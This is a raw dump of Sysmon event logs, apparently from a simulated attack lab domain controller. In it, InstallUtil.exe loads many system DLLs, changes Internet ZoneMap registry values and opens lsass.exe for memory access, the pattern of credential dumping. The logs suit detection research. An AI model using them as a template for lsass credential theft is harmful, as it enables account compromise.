(rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057614452Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.687{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdsapi.dll10.0.14393.0 (rs1_release.160715-1616)Active Directory Domain Services APIMicrosoft® Windows® Operating SystemMicrosoft Corporationntdsapi.dllMD5=01AD803D409DC3C6582A9C519EB4B014,SHA256=C5A0873EC1223A67CE5980BB62F176FDF2E61BB54081CE004F479629413F27AAtrueMicrosoft WindowsValid 734700x800000000000000057614435Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.703{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=92CD5DA45ABA4CE45313783FCB345D99,SHA256=B0F20BE2B144056E488F8FF51E266F426625E64E3C91CCD17895A441A0935C46trueMicrosoft WindowsValid 734700x800000000000000057614432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.687{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057614430Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.687{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\logoncli.dll10.0.14393.3808 (rs1_release.200707-2105)Net Logon Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationLOGONCLI.DLLMD5=B5C16F0A457DB3C7695AAC9EE7E3EE1E,SHA256=88764349C57E619C6D1253BB2F4AFB27DBD141E9EB9C12D445C20F7384A4F437trueMicrosoft WindowsValid 734700x800000000000000057614429Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.687{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057614428Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.687{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AAtrueMicrosoft WindowsValid 734700x800000000000000057614427Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.687{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000057614426Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.672{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000057614425Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.641{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057614424Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.625{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057614423Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.625{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057614422Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.625{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057614421Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.625{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057614420Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.625{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057614419Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.625{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057614418Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.625{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057614417Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057614416Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057614415Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057614414Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057614413Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057614412Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057614411Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057614410Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057614409Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057614408Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057614407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057614406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057614405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057614404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057614403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057614402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057614401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057614400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057614399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057614398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.609{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057614397Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.594{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057614396Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.594{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057614395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.594{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057614394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.594{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057614393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.594{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057614392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057614391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057614390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:45:57.578{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7ed-0x2604c22a) 734700x800000000000000057614388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057614387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057614386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 